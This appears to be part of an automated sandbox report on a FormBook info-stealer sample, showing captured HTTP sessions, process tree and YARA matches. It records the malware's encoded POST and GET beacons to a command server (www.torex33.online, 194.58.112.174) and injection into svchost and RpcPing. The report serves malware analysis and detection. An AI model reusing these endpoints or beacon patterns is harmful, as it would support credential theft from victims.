                                                                                                                                                                                                              Data Raw: 65 33 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 8c fc 40 5d 39 75 ca f4 3d d7 f1 54 dd d2 35 75 7c e9 8b 40 b9 8d 52 18 8d 5d 15 f6 94 c2 24 03 d5 71 64 a3 24 5d b7 24 7a 81 da c8 45 65 d1 0c 39 8a 7c d3 0e 43 4c 30 e9 ef 60 11 59 eb 0d 09 a9 7c cf c4 9f d5 e5 92 20 ed 41 59 03 d9 55 d6 15 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: e32Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk@]9u=T5u|@R]$qd$]$zEe9|CL0`Y| AYU68i]?s#[!l 7hgGUW]<ftt0y4JHPad%WAPvT6l<6,f#mSQd4Z~gma+|\|j-"RAqnj4T=E|\DL$x7 ;TJmj3h,[J~xA\!hv3y?YdnabJpAS[FlF#d0S6NmX`j(er>\4nz;hXb-`->\(|/U +!~b+&j)Rs,CH-p3;"g=k;jo,u8H%9G+GohB((=v^MH''aQ4$#;Rt2!uZe(x/$)#-8a8j)k^!pc0_kfT0\UGrXo1fmEm_G [TRUNCATED]
                                                                                                                                                                                                              Oct 8, 2024 15:37:01.358947039 CEST1236INData Raw: df d3 f6 e9 ac 13 f3 17 a8 d5 35 06 f0 65 c7 6b b9 6a 23 32 b4 5f 63 c2 28 f0 bd ee d3 8d 02 1e 06 dc 6d 0a 63 ff 02 7a 11 b3 a0 de c7 f1 3d e0 8c 47 98 e2 d8 59 d7 d5 ca 09 47 6d 6d f2 5c 92 b6 0f b6 1b 20 4a 7a 0a e3 fe 19 b1 ef 7e f2 25 5c e4
                                                                                                                                                                                                              Data Ascii: 5ekj#2_c(mcz=GYGmm\ Jz~%\qynT\@)9f@JF@towZYj!;]har`$C/0N1(j$?<,C*r>C+@?: 1AO!V?lX
                                                                                                                                                                                                              Oct 8, 2024 15:37:01.358963013 CEST1236INData Raw: 65 95 c8 78 ff 49 a4 c9 5c 07 ca d2 71 58 e4 a9 68 0a 2f 4e bc 17 83 31 db 87 73 0a 0b d2 a3 b0 4e 89 40 31 89 45 d2 cc 69 01 67 c5 85 e3 09 34 47 4a 0c 2e 7f 04 fe fc 94 c3 3d f6 b5 0c 74 c8 73 54 c4 df 70 37 00 5a e7 1a a0 ee 1a f6 ca f9 66 9a
                                                                                                                                                                                                              Data Ascii: exI\qXh/N1sN@1Eig4GJ.=tsTp7Zf|pAP9'G'y'qP4giyMg=3y"!Tz ^{R|s;.t^JfW##Y?GDA&CU1'pT
                                                                                                                                                                                                              Oct 8, 2024 15:37:01.359042883 CEST112INData Raw: f6 2a 2c 64 ab 42 2d 8e 17 36 9d d0 0f b8 88 c7 bd 5e 34 b2 e7 67 01 8c 73 68 67 d0 d5 2f d5 e6 ae 64 8b 42 98 95 c9 8b 37 6d 74 8c 8d 47 7e 3e 1c 0b 6f 77 ce ca 76 e8 bb a3 48 ad 08 ba 0c 39 6b 9c c1 cf f0 ca 4a 49 48 17 cf 9e c8 11 74 a2 3e 99
                                                                                                                                                                                                              Data Ascii: *,dB-6^4gshg/dB7mtG~>owvH9kJIHt>0f2hS)0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.9 | 60862 | 194.58.112.174 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:37:03.223001003 CEST | 1774 | OUT | POST /hd7m/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.torex33.online
Origin: http://www.torex33.online
Cache-Control: max-age=0
Content-Length: 1229
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.torex33.online/hd7m/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Raw: 74 70 54 64 3d 68 4a 7a 6b 57 63 72 30 76 48 64 57 64 31 67 64 69 51 66 33 43 75 39 6a 4b 31 54 65 35 38 77 64 6e 45 58 67 75 4b 73 72 34 2b 58 43 4e 73 49 45 33 37 73 38 44 63 37 44 6b 67 66 64 61 51 42 59 5a 76 51 56 47 75 71 75 54 58 2b 45 56 68 58 71 31 74 4d 65 35 51 52 53 6a 48 50 52 69 41 6e 35 37 78 45 66 39 2f 2f 4e 4a 34 4e 51 30 55 46 48 65 73 6d 67 76 49 42 67 4b 76 5a 45 76 4d 4d 49 54 58 6f 37 69 6f 62 51 6b 42 42 65 73 59 74 41 46 45 6c 46 6a 49 4a 42 67 51 71 61 2b 72 7a 64 36 35 51 6e 34 6e 79 33 36 48 72 31 39 49 38 76 44 6a 33 73 4b 43 4e 6b 79 70 6e 75 4c 34 76 69 47 4b 36 61 2f 76 50 6c 6b 57 64 63 41 2f 51 64 51 61 44 48 56 62 73 65 77 6f 54 6d 4e 66 73 73 41 59 6b 73 56 31 77 65 6e 43 67 42 4c 2f 32 68 4d 4a 31 35 5a 4c 42 4a 43 72 50 56 58 44 59 31 6e 58 6b 52 70 34 72 79 57 67 4a 47 2f 71 51 30 39 6c 50 61 72 51 4e 55 6c 34 5a 37 51 7a 53 63 78 67 59 46 4f 4b 45 47 45 34 4f 75 54 52 72 6d 4a 32 41 45 53 49 47 79 51 65 44 4f 52 52 44 4e 59 33 33 41 35 56 42 30 36 6a 42 79 42 [TRUNCATED]
Data Ascii: tpTd=hJzkWcr0vHdWd1gdiQf3Cu9jK1Te58wdnEXguKsr4+XCNsIE37s8Dc7DkgfdaQBYZvQVGuquTX+EVhXq1tMe5QRSjHPRiAn57xEf9//NJ4NQ0UFHesmgvIBgKvZEvMMITXo7iobQkBBesYtAFElFjIJBgQqa+rzd65Qn4ny36Hr19I8vDj3sKCNkypnuL4viGK6a/vPlkWdcA/QdQaDHVbsewoTmNfssAYksV1wenCgBL/2hMJ15ZLBJCrPVXDY1nXkRp4ryWgJG/qQ09lParQNUl4Z7QzScxgYFOKEGE4OuTRrmJ2AESIGyQeDORRDNY33A5VB06jByB [TRUNCATED]
Oct 8, 2024 15:37:03.925353050 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:37:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
Data Raw: 65 33 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 8c fc 40 5d 39 75 ca f4 3d d7 f1 54 dd d2 35 75 7c e9 8b 40 b9 8d 52 18 8d 5d 15 f6 94 c2 24 03 d5 71 64 a3 24 5d b7 24 7a 81 da c8 45 65 d1 0c 39 8a 7c d3 0e 43 4c 30 e9 ef 60 11 59 eb 0d 09 a9 7c cf c4 9f d5 e5 92 20 ed 41 59 03 d9 55 d6 15 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f [TRUNCATED]
Data Ascii: e32Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk@]9u=T5u|@R]$qd$]$zEe9|CL0`Y| AYU68i]?s#[!l 7hgGUW]<ftt0y4JHPad%WAPvT6l<6,f#mSQd4Z~gma+|\|j-"RAqnj4T=E|\DL$x7 ;TJmj3h,[J~xA\!hv3y?YdnabJpAS[FlF#d0S6NmX`j(er>\4nz;hXb-`->\(|/U +!~b+&j)Rs,CH-p3;"g=k;jo,u8H%9G+GohB((=v^MH''aQ4$#;Rt2!uZe(x/$)#-8a8j)k^!pc0_kfT0\UGrXo1fmEm_G [TRUNCATED]
Oct 8, 2024 15:37:03.925373077 CEST | 1236 | IN | Data Raw: df d3 f6 e9 ac 13 f3 17 a8 d5 35 06 f0 65 c7 6b b9 6a 23 32 b4 5f 63 c2 28 f0 bd ee d3 8d 02 1e 06 dc 6d 0a 63 ff 02 7a 11 b3 a0 de c7 f1 3d e0 8c 47 98 e2 d8 59 d7 d5 ca 09 47 6d 6d f2 5c 92 b6 0f b6 1b 20 4a 7a 0a e3 fe 19 b1 ef 7e f2 25 5c e4
Data Ascii: 5ekj#2_c(mcz=GYGmm\ Jz~%\qynT\@)9f@JF@towZYj!;]har`$C/0N1(j$?<,C*r>C+@?: 1AO!V?lX
Oct 8, 2024 15:37:03.925398111 CEST | 1236 | IN | Data Raw: 65 95 c8 78 ff 49 a4 c9 5c 07 ca d2 71 58 e4 a9 68 0a 2f 4e bc 17 83 31 db 87 73 0a 0b d2 a3 b0 4e 89 40 31 89 45 d2 cc 69 01 67 c5 85 e3 09 34 47 4a 0c 2e 7f 04 fe fc 94 c3 3d f6 b5 0c 74 c8 73 54 c4 df 70 37 00 5a e7 1a a0 ee 1a f6 ca f9 66 9a
Data Ascii: exI\qXh/N1sN@1Eig4GJ.=tsTp7Zf|pAP9'G'y'qP4giyMg=3y"!Tz ^{R|s;.t^JfW##Y?GDA&CU1'pT
Oct 8, 2024 15:37:03.925409079 CEST | 112 | IN | Data Raw: f6 2a 2c 64 ab 42 2d 8e 17 36 9d d0 0f b8 88 c7 bd 5e 34 b2 e7 67 01 8c 73 68 67 d0 d5 2f d5 e6 ae 64 8b 42 98 95 c9 8b 37 6d 74 8c 8d 47 7e 3e 1c 0b 6f 77 ce ca 76 e8 bb a3 48 ad 08 ba 0c 39 6b 9c c1 cf f0 ca 4a 49 48 17 cf 9e c8 11 74 a2 3e 99
Data Ascii: *,dB-6^4gshg/dB7mtG~>owvH9kJIHt>0f2hS)0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.9 | 60863 | 194.58.112.174 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:37:05.782306910 CEST | 475 | OUT | GET /hd7m/?tpTd=sLbEVsfW73VtVB0Jvj7gC+ceEVX4meQWoUuArYo60q3nO/kAxb5tEPXYoxmPYHkEXIEIOfWFMW/cSWDV+KoY2jgQgwLtxzjq6i8n+9HhH6xOpB1tMw==&WX=rnWllP5PLlhLLtj HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.torex33.online
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Oct 8, 2024 15:37:06.472611904 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:37:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Raw: 32 39 35 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 74 6f 72 65 78 33 33 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 [TRUNCATED]
Data Ascii: 2953<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.torex33.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.ru [TRUNCATED]
Oct 8, 2024 15:37:06.472735882 CEST | 1236 | IN | Data Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63
Data Ascii: <div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.torex33.online</h1><p class="b-parking__header
Oct 8, 2024 15:37:06.472752094 CEST | 448 | IN | Data Raw: 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70
Data Ascii: .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_hostin
Oct 8, 2024 15:37:06.472765923 CEST | 1236 | IN | Data Raw: 70 3b d0 b1 d1 8b d1 81 d1 82 d1 80 d1 8b d0 b9 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 66 65 61 74 75 72 65 73 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69
Data Ascii: p;</p></div></div><ul class="b-parking__features"><li class="b-parking__features-item"><strong class="b-title b-parking__features-title"></strong><p class="b-text">&nbsp;
Oct 8, 2024 15:37:06.472784042 CEST | 1236 | IN | Data Raw: 33 26 6e 62 73 70 3b 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 68 61 72 2d 72 6f 75 62 6c 65 2d 6e 61 74 69 76 65 22 3e 26 23 38 33 38 31 3b 3c 2f 73 70 61 6e 3e 20 3c 2f 62 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f 6c
Data Ascii: 3&nbsp;<span class="char-rouble-native">&#8381;</span> </b><span class="l-margin_left-small">&nbsp;</span></p></div></div><div class="b-parking__promo-item b-parking__promo-item_type_hosting"><strong class="b-title b-title_size_lar
Oct 8, 2024 15:37:06.472804070 CEST | 1236 | IN | Data Raw: d0 bd d0 be d0 b2 d0 ba d0 b8 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d1 8b d1 85 20 d0 bc d0 be d0 b4 d1 83 d0 bb d0 b5 d0 b9 2e 3c 2f 70 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75
Data Ascii: .</p><a class="b-button b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/web-sites/?utm_source=www.torex33.onli
Oct 8, 2024 15:37:06.472816944 CEST | 1236 | IN | Data Raw: 67 68 74 2d 6c 61 72 67 65 22 3e 3c 2f 73 70 61 6e 3e 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 62 2d 74 69 74 6c 65 20 62 2d 74 69 74 6c 65 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 20 62 2d 74 69 74 6c 65 5f 6d 61 72 67 69
Data Ascii: ght-large"></span> <strong class="b-title b-title_size_large-compact b-title_margin_none">SSL- &nbsp;6 </strong><a class="b-button b-button_color_reference b-button_size_medium-compact
Oct 8, 2024 15:37:06.472836018 CEST | 896 | IN | Data Raw: 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6f 6e 64 61 74 61 28 64 61 74 61 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 64 61 74 61 2e 65 72 72 6f 72 5f 63 6f
Data Ascii: set="utf-8"></script><script>function ondata(data){ if ( data.error_code ) { return; } if ( data.ref_id ) { var links = document.querySelectorAll( 'a' ); for
Oct 8, 2024 15:37:06.473220110 CEST | 1236 | IN | Data Raw: 61 63 6b 3d 6f 6e 64 61 74 61 27 3b 0a 20 20 20 20 20 20 20 20 73 63 72 69 70 74 2e 61 73 79 6e 63 20 3d 20 31 3b 0a 20 20 20 20 20 20 20 20 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 20 73 63 72 69 70 74 20 29 3b 3c 2f 73 63 72 69 70 74
Data Ascii: ack=ondata'; script.async = 1; head.appendChild( script );</script><script>if ( 'www.torex33.online'.match( /xn--/ ) && document.querySelectorAll ) { var spans = document.querySelectorAll( 'span.puny, span.no-puny' ),
Oct 8, 2024 15:37:06.473464012 CEST | 746 | IN | Data Raw: 6e 74 73 29 3b 7d 0a 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 33 33 38 30 39 30 39 2d 32 35 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c
Data Ascii: nts);} gtag('js', new Date()); gtag('config', 'UA-3380909-25');</script>... Yandex.Metrika counter --><script type="text/javascript">(function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)}; m[i].l=1*ne



                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                              Start time:09:32:59
                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                              Path:C:\Users\user\Desktop\N2Qncau2rN.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\N2Qncau2rN.exe"
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              File size:1'401'699 bytes
                                                                                                                                                                                                              MD5 hash:47D011CED9BD433871F605C662C06B55
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                              Start time:09:33:00
                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\N2Qncau2rN.exe"
                                                                                                                                                                                                              Imagebase:0x110000
                                                                                                                                                                                                              File size:46'504 bytes
                                                                                                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1886252240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1886252240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1888965861.0000000006200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1888965861.0000000006200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                              Start time:09:33:14
                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe"
                                                                                                                                                                                                              Imagebase:0xa00000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                              Start time:09:33:17
                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\RpcPing.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Windows\SysWOW64\RpcPing.exe"
                                                                                                                                                                                                              Imagebase:0x5d0000
                                                                                                                                                                                                              File size:26'624 bytes
                                                                                                                                                                                                              MD5 hash:F7DD5764D96A988F0CF9DD4813751473
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4122907990.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4122907990.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4126780482.0000000002730000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4126780482.0000000002730000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                              Start time:09:33:30
                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe"
                                                                                                                                                                                                              Imagebase:0xa00000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4131107461.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4131107461.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                              Start time:09:33:42
                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                              Imagebase:0x7ff73feb0000
                                                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
